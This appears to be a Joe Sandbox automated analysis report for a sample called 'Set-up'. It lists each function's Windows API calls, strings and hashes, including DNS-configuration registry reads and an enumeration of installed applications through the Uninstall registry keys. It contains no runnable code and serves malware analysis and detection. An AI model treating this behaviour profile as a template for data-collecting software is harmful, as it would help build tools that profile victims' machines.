Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
String ID: multi.c
API String ID: 3264668090-214371023
Opcode ID: 1250a1b1dcffc689de64ebdd7f22584af5fa116659b0007ff89dc49d453d9c5a
Instruction ID: 64dd8902c0598eacd94757f3cdfca0abb927af2a3e4c014d02bd32b02fb356e7
Opcode Fuzzy Hash: 1250a1b1dcffc689de64ebdd7f22584af5fa116659b0007ff89dc49d453d9c5a
Instruction Fuzzy Hash: 89D1D275A087819FE712CF65D881B6F77E5FF98308F04482DF88586292E7B4E984CB52

Function 0029B180 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 0029B2B6
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(cur != NULL,ares__sortaddrinfo.c,000001A4,?,?,00000000,0000000B,?,?,00283C41,00000000), ref: 0029B3F7

Strings

X\h, xrefs: 0029B1C3
`\h, xrefs: 0029B3CC
ares__sortaddrinfo.c, xrefs: 0029B3ED
cur != NULL, xrefs: 0029B3F2

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assertgetsockname
String ID: X\h$`\h$ares__sortaddrinfo.c$cur != NULL
API String ID: 1186336949-3394859631
Opcode ID: 1fdf02474935371bdbbcffb5388e63435a304f261d27b1f780904d69afb6d3eb
Instruction ID: 76798652c9bb5758578f0f9c56df912b38309f42de6948af93a89617f2aecdac
Opcode Fuzzy Hash: 1fdf02474935371bdbbcffb5388e63435a304f261d27b1f780904d69afb6d3eb
Instruction Fuzzy Hash: CBC19031A143059FDB19DF24EA94A6A77E1FF88704F45846CF8498B3A2D730ED65CB81

Function 001E6FA0 Relevance: 13.8, APIs: 9, Instructions: 255sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 001E7010

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: eafc7aa51e28d4fbb8052ced1945e1efe031fa830dd612f72377fddd3802e11f
Instruction ID: a749fe63dbac6ff03c8afb4b9200c334a4ff60c5c589b5e24b3f119faa7653bb
Opcode Fuzzy Hash: eafc7aa51e28d4fbb8052ced1945e1efe031fa830dd612f72377fddd3802e11f
Instruction Fuzzy Hash: 1291F33060CB8A8BE3358B6AD8947BFB2E5FFC5760F148B2CE895421D4E7709D41D691

Function 001D11A3 Relevance: 12.1, APIs: 8, Instructions: 115sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 001D11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001D1238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D1261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D1344
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D140C

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 1209083157-0
Opcode ID: f5170a22448f3fe5e2d3bcd5b472fd15bd7cb85d2f5cfa03611c463675b6245d
Instruction ID: 65facaff532004c3bfb68950d6624d6cc8651928f59416b2ea410c88ec70938a
Opcode Fuzzy Hash: f5170a22448f3fe5e2d3bcd5b472fd15bd7cb85d2f5cfa03611c463675b6245d
Instruction Fuzzy Hash: AB416CB4A08345AFDB10EFA4E995B6DBBF0BB49300F11492ED8449B350D7759884DF51

Function 001D13C9 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 001D1238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D1261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D1344

Part of subcall function 00558A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,001D13EF), ref: 00558A2A

_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D140C

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 2715571461-0
Opcode ID: b54bbb31257b6086b9f9b09cb731178f6b0746b3271a0fa3d51de7029299b175
Instruction ID: 905c21386e5f3eb02cc7b6676de06949d1e5ba1424118c1767454739e80c1049
Opcode Fuzzy Hash: b54bbb31257b6086b9f9b09cb731178f6b0746b3271a0fa3d51de7029299b175
Instruction Fuzzy Hash: 6E4169B4A18342AFDB10EF64E995B6DBBF0FB46301F11882ED98497310DB359888DF42

Function 001D1160 Relevance: 10.6, APIs: 7, Instructions: 131sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 001D11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001D1238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D1261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D1344
GetStartupInfoA.KERNEL32 ref: 001D1433

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 1d2784aa304eb13d4cef73bc167708915ebe041c8f1cc013768e45a25ca5e1b6
Instruction ID: 7b6c183cb538a1c24f97f3eb4bf58f689e4e0586ba036c245e1faaaf85b50654
Opcode Fuzzy Hash: 1d2784aa304eb13d4cef73bc167708915ebe041c8f1cc013768e45a25ca5e1b6
Instruction Fuzzy Hash: 6651A075A08341AFDB14DFA4D995B6EBBF0FB4A300F11892EE9449B310D7359984DB81

Function 0029A870 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(000000FF,00286F4E,000000FF,00000000), ref: 0029A8AF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 4f8229288a0c0d616736ace10c401aaad4917e09fb78981f279d7efedcf0d0e4
Instruction ID: 58530634a4d707ad58f0e13aef6996e90c2db9aaab8222c8197a90d15fe308fe
Opcode Fuzzy Hash: 4f8229288a0c0d616736ace10c401aaad4917e09fb78981f279d7efedcf0d0e4
Instruction Fuzzy Hash: 68F03072B147217FD6248E58EC05F9BF369FBC4B20F158909F95567248C370BC1186E2

Function 0028A440 Relevance: 99.0, APIs: 43, Strings: 13, Instructions: 1038registrystringCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0028AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0028AA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0028AA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0028AAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0028AB30
RegCloseKey.KERNELBASE(?), ref: 0028AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0028AB82
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 0028ABAD
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 0028ABF0
RegCloseKey.ADVAPI32(?), ref: 0028AC2A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0028AC46
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 0028AC71
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 0028ACB4
RegCloseKey.ADVAPI32(?), ref: 0028ACEE
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0028AD0A
RegEnumKeyExA.KERNELBASE ref: 0028AD8D
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 0028ADB0
RegCloseKey.KERNELBASE(?), ref: 0028ADD9
RegEnumKeyExA.KERNELBASE ref: 0028AE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0028AE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0028AE54
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 0028AEA3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0028AF18
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 0028AF2C
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0028AF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0028AFB2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0028B027
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 0028B03B
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0028B072
RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 0028B0C1

Strings

X\h, xrefs: 0028A45F, 0028A47D, 0028AA73, 0028AB10, 0028ABD4, 0028AC98, 0028AE7F, 0028AF8E, 0028B09D
[%s]:%u, xrefs: 0028A845
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 0028AD00
DhcpDomain, xrefs: 0028B06C, 0028B0BB
Software\Policies\Microsoft\System\DNSClient, xrefs: 0028AC3C
PrimaryDNSSuffix, xrefs: 0028AC6B, 0028ACAE
`\h, xrefs: 0028A4DB, 0028A9B3, 0028AAB3, 0028AB5B, 0028AC1B, 0028ACDF, 0028AD38, 0028ADBD, 0028AF39, 0028B048
SearchList, xrefs: 0028AA46, 0028AA91, 0028ABA7, 0028ABEA, 0028AE4E, 0028AE9D
Domain, xrefs: 0028AAE3, 0028AB2A, 0028AF5D, 0028AFAC
\\h, xrefs: 0028A4BA, 0028A50F, 0028A5FA, 0028A65A, 0028A95D, 0028AEF1, 0028B000, 0028B113
[%s]:%u%%%u, xrefs: 0028A77D
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 0028AB78
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 0028AA0F

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$X\h$[%s]:%u$[%s]:%u%%%u$\\h$`\h
API String ID: 1856363200-1203146254
Opcode ID: b6fc9a6ac2e768f5045d952dbfedf9fce3669c1c3358471feb1c940c283c44a6
Instruction ID: 0f7ca865a2d4400254298778a316ef3a5fed15b6a0f9bef83d583793eac26968
Opcode Fuzzy Hash: b6fc9a6ac2e768f5045d952dbfedf9fce3669c1c3358471feb1c940c283c44a6
Instruction Fuzzy Hash: B982C075629302AFE710AF24CC86B6B7BE8FF84700F144829F945D72A1EB74E954CB52

Function 00299740 Relevance: 35.7, APIs: 12, Strings: 8, Instructions: 736
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 0029978D
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 002997BA
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 002997E4
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 002998A5
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 00299920
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00299946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00299974
ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104), ref: 00299981
RegCloseKey.ADVAPI32(?), ref: 0029998B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00299992
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 002997FE

Part of subcall function 002978A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,0029E16D,?), ref: 002978AF
Part of subcall function 002978A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 002978D9

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 00299C46

Strings

sts, xrefs: 002999A2
#, xrefs: 00299A3F
DatabasePath, xrefs: 0029996B
\hos, xrefs: 0029999A
CARES_HOSTS, xrefs: 00299788
`\h, xrefs: 00299772, 00299812, 00299835, 002999C4, 002999FE, 00299B11, 00299B5A, 00299E54, 00299F57, 00299F8B, 00299FB7, 00299FD1, 0029A007, 0029A03B
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 0029993C
#, xrefs: 00299B9D

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$`\h$sts
API String ID: 3843116398-794612536
Opcode ID: 60ad2362b905564eac136a2ccf9e9bc029d1a294b6e628435698ee41cc525325
Instruction ID: 712b960bdf9db4898c9375e365b35db707ff744aa0c479a307e40f8d1b254d58
Opcode Fuzzy Hash: 60ad2362b905564eac136a2ccf9e9bc029d1a294b6e628435698ee41cc525325
Instruction Fuzzy Hash: 7B32D8B5924202ABEF11AF28EC46A1B76D4AF55364F084438FC0996263F731ED74DB93

Function 001D2F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 001D2FED
RegEnumKeyExA.KERNELBASE ref: 001D31A5

Strings

DisplayName, xrefs: 001D30BD
installed_apps, xrefs: 001D2F36
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 001D2F5D
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 001D2F49, 001D2F71
app_name, xrefs: 001D30F0
index, xrefs: 001D3112
%s\%s, xrefs: 001D3028
d, xrefs: 001D2FA0

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: EnumOpen
